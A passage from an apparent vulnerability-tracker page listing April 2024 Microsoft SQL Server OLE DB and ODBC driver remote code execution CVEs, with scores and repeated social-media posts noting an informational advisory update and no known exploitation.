  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29043
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28926
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28927
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28938
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
